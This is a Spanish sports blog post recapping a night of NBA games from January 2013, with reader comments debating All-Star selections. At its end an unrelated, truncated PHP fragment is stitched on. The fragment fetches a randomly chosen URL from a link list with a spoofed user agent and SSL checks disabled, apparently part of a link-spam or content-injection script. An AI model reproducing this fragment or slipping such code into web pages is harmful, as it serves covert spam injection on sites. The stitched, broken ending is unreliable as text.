La Crónica: Warriors Rules

24 de January de 2013 por Simon

El otro día discutíamos sobre la presencia  de Stephen Curry en el All-Star. Bien, cualquiera que viera el partido de anoche no tendrá ninguna duda. Los Warriors han ganado en 3 días a los dos mejores equipos de la liga y en ambos con partidos igualados, lo cual añade dificultad a la tarea. La primera parte transcurrió con constantes alternancias en el marcador. Los Thunder eran sostenidos por Durant que logró en la primera parte 18 puntos. El guión de la segunda parte fue prácticamente el mismo de la primera, las ventajas de ambos equipos apenas superaban los 4 puntos. A falta de 8 minutos los Thunder parecían escaparse con 8 puntos de ventaja pero un robo de Landry culminado con el contraataque deCurry cambió el sentido del partido. A partir de ahí los Warriors fueron un vendaval comandado por el base que sentenció el partido con un robo y tiros libres a falta de 15 segundos. Durant logró 33 puntos y 9 asistencias pero estuvo muy solo sin la ayuda de Westbrook que tuvo una noche para olvidar con 3/16 en el tiro y 6 pérdidas. Curry logró 31 puntos y 7 asistencias, estuvo bien arropado por Lee y Landry con 22 y 20 puntos respectivamente (99-104). Warriors continúa en un gran momento de juego. Si tuviéramos que apostar ahora mismo lo haríamos por ellos como 4º de conferencia por delante de Memphis.

Miami Heat necesitó de una prórroga para ganar a unos combativos Raptors que dan la sensación de tener menos victorias de las que merecen. Durante los dos primeros cuartos Toronto mandó en el marcador con ventajas entre 5 y 10 puntos e incluso un pico de +14 pero en la segunda mitad los Heat se pusieron el mono de trabajo y acabaron con toda la ventaja canadiense enseguida. Al entrar en el último cuarto con Heat por delante se podía pensar que el resto del partido sería ser un paseo militar para Miami pero en ese último período fueron los Lebron y compañía los que tuvieron que ir respondiendo a cada golpe de los Raptors.  A falta de 1 minuto y medio Calderón con un triple ponía 3 arriba a Toronto pero James igualaba el partido en la jugada siguiente y se llegaba con empate al final del tiempo reglamentario. En la prórroga los Raptors se quedaron sin gasolina y los Heat terminaron por llevarse el partido. Lebron James nos tiene tan acostumbrados a estos números que ni siquiera nos causan impacto: anoche 31 puntos, 10 rebotes y 11 asistencias. Wade se marcó también un gran partido con 35 puntos y 7 rebotes. Toronto tuvo 7 jugadores en dobles dígitos. (116-123). 

Memphis derrotó sin excesivos problemas a Lakers (93-106). Desde el segundo cuarto Memphis se puso por delante en el marcador y ya el partido no tuvo mucha historia. Los Grizzlies se dedicaro  a mantener la ventaja que se movía en torno a los 10 puntos. Incluso los suplentes tuvieron más minutos de lo normal. Memphis tuvo 6 hombres en dobles dígitos, destacando los 20 puntos de Arthur. Lakers perdió por lesión en el hombro a Howard al final del segundo cuarto y todavía no ha trascendido el alcance de la lesión pero visto la racha de Lakers no me extrañaría que tuviéramos una mala noticia en las próximas horas, porque ya saben, a perro flaco todo son pulgas.

En el duelo Denver@Houston fueron los Nuggets los que se llevaron el gato al agua en el partido que enfrentaba a los dos equipos más ofensivos de la competición. Tras una primera parte igualada, Denver rompió el marcador en el tercer cuarto y en el último mantuvo la ventaja para seguir afianzándose en Play Off.  Iguodala alcanzó los 10.000 puntos en su carrera anoche (105-95). Denver está en pleno ascenso pero parece que a esta altura de temporada ya ha alcanzado su tope. No creo que acaben  más arriba de lo que están actualmente clasificados.

Brooklyn continúa su ascenso y ya está a punto de alcanzar a sus vecinos los Knicks en la clasificación. Anoche la victima fueron los Wolves (91-83). Buen partido del Big Three de los Nets con 58 puntos entre los 3.  Por su parte, San Antonio Spurs se afianzó en el segundo puesto de la conferencia con su victoria en casa ante los renacidos New Orleans Hornets (102-106) que anunciarán durante el día de hoy que oficialmente a partir de la temporada que viene pasaran a llamarse “Pelicans. Josh Smith aprovechó la baja de Horford para liderar a su equipo con 30 puntos para vencer a Charlotte (104-92), que por cierto se rumorea que podrían recuperar el nombre de Hornets al dejarlo libre New Orleans.

En el resto de la jornada, Portland logró una importante victoria ante Indiana, que venía de ganar a Memphis, y con esta victoria y la derrota de Rockets consiguen meterse en puestos de Play Off (80-100). Aldridge logró 27 puntos para su equipo; Utah no se dejó sorprender en casa ante Washington gracias en parte a los 16 puntos y 15 rebotes de Millsap (88-92); Chicago venció a Detroit (82-85) gracias a un gran último cuarto en el que remontaron una desventaja de 11 puntos y a una jugada brutal de Noah y Bellineli a falta de 7 segundos. Por último Phoenix aprovechó la derrota de NOLA y venció a Sacramento a domicilio para escapar de la última posición del Oeste (106-96).

PREMIOS

MVP: Tampoco parece que vaya a ser este año el del primer All-Star de Josh Smith. Anoche dejó huella con 30 puntos, 13 rebotes, 8 asistencias y 3 rebotes pero creo que ya no está a tiempo. Lebron James y Dwyane Wade sí que estarán y actuaciones como ayer demuestran que un All-Star es su hábitat natural. El primer consiguió un triple-doble con 31 puntos, 10 rebotes y 11 asistencias y el segundo anotó 35 puntos, capturó 5 rebotes y repartió 7 asistencias.

Rookie: Algo muy fuerte ha de pasar de aquí al final de temporada para que Damian Lillard no sea el sorprendente (a principio de temporada) rookie del año. Un día más fue de lo mejor de los Blazers con 20 puntos y 8 asistencias.

Sorpresa: Grandes partidos de varios secundarios. Ramon Sessions anotó 27 puntos; Tiago Splitter, ya perfectamente asentado como titular, acabó con 25 puntos y 7 rebotes, y Darrell Arthur, al que vamos a ver muchos tras el traspaso de Marresse Speights a los Cavs, se fue a los 20 puntos y 9 rebotes.

Decepción: No vale la pena volver a hablar de los Lakers pero podríamos repartir un poco también para Steve Nash. Acabó el partido con 6 pérdidas y una defensa inexistente. Por ahí pueden venir muchos de los problemas defensivos de los amarillos. Otro que tampoco tuvo su noche fue Russell Westbrook. Perdió también 6 balones y se marcó un 3 de 16 en tiros de campo.

Esfuerzo en vano: No veremos a Kevin Durant muchos días en la parte baja de los premios pero anoche, no pudo con los Warriors a pesar de sus 33 puntos, 5 rebotes, 9 asistencias y 3 tapones.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

23 comentarios a esta entrada

  1. Ana dice:
    #1

    Hola internautas 😉

    me gusta la nba y este año espero q gane miami heat el campeonato!! Durant me parece un gran jugador aunque no tenga tanta capacidad de poder asistir,rebotar,robar etc.. como lebron!1

    Los lakers dan pena, nash es un vago! animo pau 😉

    lillard sera el rookie of the year, mas claro que el agua!!

    Sinceramente creo que el lagun aro podria ganar a los lakersy incluso si se esfuerzan mucho a miami !!

    Visto lo visto espero que doblas fiche x los lakers y aga mejorar al equipo y aaa y a ion etxezurieta de base tambien +

    un saludo;)

      Citar

  2. Denise dice:
    #2

    Visto lo visto…¿Declaramos a Orlando como ganador del trade a 4 bandas?

    – Philadelphia le está pagando a Bynum por ver los partidos desde el sofa de casa
    – Lakers perdiendo dia si y dia tambien, con Howard sin estar al 100% y con dudas sobre su renovación
    – Denver haciendo una temporada irregular con Iguodala jugando de forma mediocre.
    – Orlando ha conseguido a Vucevic que está en modo MIP, y Afflalo está haciendo una buena temporada. Lo negativo, el contratito de Harrington.

    No confío mucho en Arthur, no todos los días son domingo y creo que los Grizzlies echarán bastante de menos a Speights.

      Citar

  3. Jose Luis dice:
    #3

    Hombre, aquel año que echaron a los Spurs en primera ronda, la rotación interior era la misma que este, y Arthur jugó a un buen nivel.

      Citar

  4. franitis dice:
    #4

    Al Jefferson, Josh Smith, Brandon Jennings y Cousins (entre otros) serían FA a finales de temporada; ¿Qué opciones pensáis para ellos? Los que más veo buscando otro equipo a final de temporada son los dos primeros (y el otro día vi un reportaje en el que Bucks estaba escuchando ofertas de traspaso por Jennings, aparte de la rumorología de los Celtics y Cousins…).

    ¿Creeis que LA los tendrá en cuenta?

      Citar

  5. Jose Luis dice:
    #5

    Cousins no es agente libre, aún le quedan 2 años y después la Qualifying Offer. Los demás sí, pero los Lakers no tienen ninguna opción de fichar agentes libres debido a los altos salarios que ya tienen en nómina.

    Smith espero que sea traspasado, Jefferson quizá renueve en Utah, Jennings no sé qué pasará con él.

      Citar

  6. Esteban dice:
    #6

    Jose Luis:
    Hombre, aquel año que echaron a los Spurs en primera ronda, la rotación interior era la misma que este, y Arthur jugó a un buen nivel.

    es cierto, en aquel entonces arthur era la hostia, lanzaba a distancia como el mejor, tuvo un año en blanco y ha vuelto bien a mi entender, pero aun asi los veo cortos de internos, sobretodo cuando su juego es tan fisico

      Citar

  7. HisRoyalAirness dice:
    #7

    Acabo de ver el Brooklyn-Minnesotta y tengo que decir que es INCREÍBLE lo que hacen los Wolves con lo poco que tienen. En todo momento hubo partido y ultimamente es una constante. Posiblemente, con los efectivos de los que disponen en este momento, son el peor equipo de todo el campeonato y siempre dan la talla. Ayer se enfrentaban a un equipo con 3 All-Star y un potencial cuarto y les llegaron a meter el miedo en el cuerpo.
    Impresionante el rendimiento de Chris Johnson.

    Que aprendan los Lakers

      Citar

  8. GreenPride dice:
    #8

    Bueno pues de anoche he visto el Grizzlies-Lakers y el Warriors-Thunder.
    En Memphis prácticamente no hubo partido. Unos Lakers totalmente perdidos no fueron rival nada más que por el acierto de Kobe durante los primeros 2 cuartos. Horrible Howard hasta que se lesionó, mal Pau todo el partido, defensa inexistente sobre todo por parte de un Nash que parece fuera del equipo y en definitiva un nuevo desastre de todo el equipo. En Memphis bien Zach&Marc, Conley se aprovechó de Nash, muy bien Arthur y alguna aportación interesante Haddadi y el novato Wrotten que van a tener minutos tras el traspaso de Ellington y Speights. Cada vez veo más imposible que estos Lakers se arreglen y lleguen a PO, quien lo iba a decir.
    Y en San Francisco, los Warriors siguen siendo la sensación de la temporada y han ganado consecutivamente a los dos mejores de la liga Clippers y ahora Thunder. En los Warriors muy bien Lee, Thompson y Curry a ráfagas y gran aportación del banquillo. Se divierten, juegan fácil y defienden. ¿Hasta donde pueden llegar si Bogut vuelve sano? Por los Thunder otro partidazo de Durantula aunque en los últimos minutos falló varios lanzamientos y perdió el último balón demostrando que también es humano. Hasta ahí había llevado a su equipo en ventaja a pesar del pésimo partido de Westbrook.
    Del resto Brooklyn suma y sigue ante unos disminuidísimos Wolves que se alejan de PO (sin Love, Pekovic, Shved, Roy, Lee, Budinger… demasiado hacen), siguen mejorando los Nuggets y empeorando los Rockets que ya están fuera de PO y suma y sigue para Chicago, San Antonio y Miami (estos por los pelos).

      Citar

  9. Ekos dice:
    #9

    Bueno, los Rockets (22-22) de momento están empatados con Portland (21-21), mantienen aún opciones de ir a PO.

      Citar

  10. Esteban dice:
    #10

    GreenPride:

    Y en San Francisco, los Warriors siguen siendo la sensación de la temporada y han ganado consecutivamente a los dos mejores de la liga Clippers y ahora Thunder. En los Warriors muy bien Lee, Thompson y Curry a ráfagas y gran aportación del banquillo. Se divierten, juegan fácil y defienden. ¿Hasta donde pueden llegar si Bogut vuelve sano?

    q pregunta, sobretodo porque bogut en un rendimiento mediocre mejoraria enormemente a EZELI, que pobre, hace lo que puede pero no da la talla para titular, y si no fuera rookie diria para la nba
    bogut vendria a solucionar el principal problema de los warriors

    se dudo mucho del traspaso de ellis, y como dije en aquel momento, juege o no bogut es un paso al frente, el equipo tenia que pasar a manos de curry, se lo haya ganado o no, era el futuro de la franquicia y vaya si salio bien

      Citar

  11. Chipi dice:
    #11

    ¿Hay algún antecedente en el que tanto Lakers como Celtics queden fuera de playoffs? Quizás estemos ante una temporada histórica.

      Citar

  12. rumbero dice:
    #12

    HisRoyalAirness:
    Acabo de ver el Brooklyn-Minnesotta y tengo que decir que es INCREÍBLE lo que hacen los Wolves con lo poco que tienen. En todo momento hubo partido y ultimamente es una constante. Posiblemente, con los efectivos de los que disponen en este momento, son el peor equipo de todo el campeonato y siempre dan la talla. Ayer se enfrentaban a un equipo con 3 All-Star y un potencial cuarto y les llegaron a meter el miedo en el cuerpo.
    Impresionante el rendimiento de Chris Johnson.

    Es una lástima lo de los Wolves. Es que uno ve que se estan jugando el partido en el último cuarto con 2 tios de contratos de 10 dias y no con Pek, Love, Budinger y Rubio y piensa donde estarian ahora con los PO cada vez más lejos. Por cierto que Rubio se ha mostrado un poco molesto por no haber jugado el último cuarto estando bien fisícamente y que lo quería comentar con Porter

      Citar

  13. Baylor dice:
    #13

    Y si Bogut volviese bien…y si wall y nene hubiesen estado…y si nash no se hubiese lesionado…y si varejao no se hubiese lesionado…y si howard fuese el mismo howard que hace un año…y si rose vuelve tras un año a nivel de mvpy tal y tal y tal. Nada de nada, Miami y thunders están y estarían muy por encima…El resto son migajas…que no es poco.

      Citar

  14. Sempren dice:
    #14

    Yo no creo que Denver sea tan irregular, Denise. Tuvo muy mal inicio, y muchos partidos fuera de casa. De hecho, en casa solo perdieron contra Heat, Wolves y Wizards, a pesar de haber jugado contra Lakers, Thunder, Warriors (2), Spurs, Clippers, Grizzlies…
    http://www.basketball-reference.com/teams/DEN/2013_games.html
    Iguodala está decepcionando algo, a mí me desespera un poco cada vez que veo un partido, aunque hay que reconocer que está aportando en bastantes facetas del juego.

      Citar

  15. HisRoyalAirness dice:
    #15

    rumbero: Es una lástima lo de los Wolves. Es que uno ve que se estan jugando el partido en el último cuarto con 2 tios de contratos de 10 dias y no con Pek, Love, Budinger y Rubio y piensa donde estarian ahora con los PO cada vez más lejos. Por cierto que Rubio se ha mostrado un poco molesto por no haber jugado el último cuarto estando bien fisícamente y que lo quería comentar con Porter

    Ricky iba a salir en el último cuarto, estaba esperando en la mesa pero de repente Barea se enchufó muchísimo y lo mandó sentar. Además no hubo casi parones y perdió minutos.
    Yo cuando veía que se ponían a 2 sin esos que tú dices (y sin Roy, ojo) me quedaba acojonado. Currando muchísimo cada canasta, defendiendo a Lopez como buenamente podían y repartiéndose el protagonismo muchísmo. Ah, y qué maravilla como se entiende Ricky y AK, ahora mismo estarían de sextos por lo menos con la plantilla al completo. En serio

      Citar

  16. Jones dice:
    #16

    No me gusta que Curry se haya quedado sin all-star, pero bueno….

      Citar

  17. suffer dice:
    #17

    Curry >>>>>>>> Westbrook eso lo define todo, pero bueno demas que se le hara.

    El otro que encuentro que esta demas es Chandler, siento que habia mas donde elegir vease Lopez de los Nets.

      Citar

  18. Esteban dice:
    #18

    lo mas extraño es que garnett este viendo el balance negativo de su equipo y su rendimiento no se comprende

    antes que paul george, merece ir josh smith, atlanta tiene menos que indiana y smith ha demostrado mucho mucho mas que george, incluso esta temporada

    antes que holiday, debia ir deron williams, la posicion en la tabla de cada equipo lo explica, no sera su mejor temporada, pero deron tiene a los nets terceros nada menos que a un juego de la sensacion NYK

    antes que noah, por lejos debia ir hordford

    y antes que chandler, no se puede discutir que debia ir LOPEZ, guste o no, esta teniendo una temporada all-star de escandalo

      Citar

  19. franitis dice:
    #19

    Otro triple doble para Rondo… y otra derrota seguida para Boston. Una buena defensa de JR Smith y las manos de mantequilla de Pierce evitaron que en los dos últimos ataques de los Celtics pudiesen hacer algo más. Clama un trade en condiciones para los Celtics si quieren hacer algo. Yo metería a Bass o Green en el trade definitivamente. Necesitan un 4 en condiciones (¿recuperar a Davis?) y alguien para el perímetro que se enchufe mejor que Terry.

      Citar

  20. Jose Luis dice:
    #20

    Si Smith debe ir por Paul George porque Atlanta tiene menos que Indiana, Holiday debe ir por Deron Williams porque los Sixers tienen menos que los Nets. Y si es por la posición del equipo, entonces Paul George debe ir por Smith.

    Yo no creo que Atlanta tenga mucho menos que Indiana… ten en cuenta que Granger está lesionado, y Louis Williams se ha lesionado hará 3-4 partidos. George debía ir. Por el lado de Holiday, de su mano salen más del 50% de las canastas de sixers, no sé si era un 60%, seguido de lejos por rondo que se quedaba unos 15 puntos porcentuales por debajo. Deron Williams ha hecho una campaña de pena.

    ¿En serio quieres meter a Smith y Horford dentro? ¿dos tios de Atlanta? No lo veo. Noah debía ir, el que más me chirría es Deng, quizá López por Deng si que hubiese sido acertado, o Horford por Deng. Chandler para mi era fijo.

      Citar

  21. rumbero dice:
    #21

    Es que a veces nos da más por mirar en que posición andan los equipos que el nivel al que estan los jugadores, y obviamente tiene su relevancia, pero a mi casos como el de Holiday o Irving me parecen de lo más normal teniendo en cuenta que lo (poco) que ganan suele ser por su culpa. A George no lo sacaría ni de broma, pero si cambiaría a Deng por Smith para que pisara de una vez un All-Star y teniendo en cuenta que ya está Noah (y muy merecidamente a mi entender). Lo de Brook Lopez si que chirria, y en el oeste se entiende que vaya el trio Parker-Westbrook-Harden pero es que se nos queda Curry fuera, y el que haya visto dos partidos de los Warriors no lo va a entender…

      Citar

  22. Esteban dice:
    #22

    Jose Luis:
    Si Smith debe ir por Paul George porque Atlanta tiene menos que Indiana, Holiday debe ir por Deron Williams porque los Sixers tienen menos que los Nets. Y si es por la posición del equipo, entonces Paul George debe ir por Smith.

    Yo no creo que Atlanta tenga mucho menos que Indiana… ten en cuenta que Granger está lesionado, y Louis Williams se ha lesionado hará 3-4 partidos. George debía ir. Por el lado de Holiday, de su mano salen más del 50% de las canastas de sixers, no sé si era un 60%, seguido de lejos por rondo que se quedaba unos 15 puntos porcentuales por debajo. Deron Williams ha hecho una campaña de pena.

    ¿En serio quieres meter a Smith y Horford dentro? ¿dos tios de Atlanta? No lo veo. Noah debía ir, el que más me chirría es Deng, quizá López por Deng si que hubiese sido acertado, o Horford por Deng. Chandler para mi era fijo.

    philadelphia tiene menos que los nets es cierto, pero los nets estan terceros en el este y los 76ers no entran ni a PO y estan con balance negativo
    mientras que los hawks, dentro de su pobreza, han tenido muy buena temporada

      Citar

  23. Esteban dice:
    #23

    tambien es irritante que el oeste no lleve ALERO SUPLENTE, es una falta de respeto para el puesto

    si no hay nadie grandioso en esa posicion, que hagan como hacia el ESTE en la posicion de esolta que iba WADE y de suplente un paquete como joe jhonson a falta de otro, pero no llevar a nadie en ese puesto no esta bien

    rudy gay no gran cosa, pero si es el segundo mejor alero del oeste debe ir, de eso se trata el all-star, los dos mejores de cada posicion y dos comodines, antes que aldrigue, gay o incluso batum

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>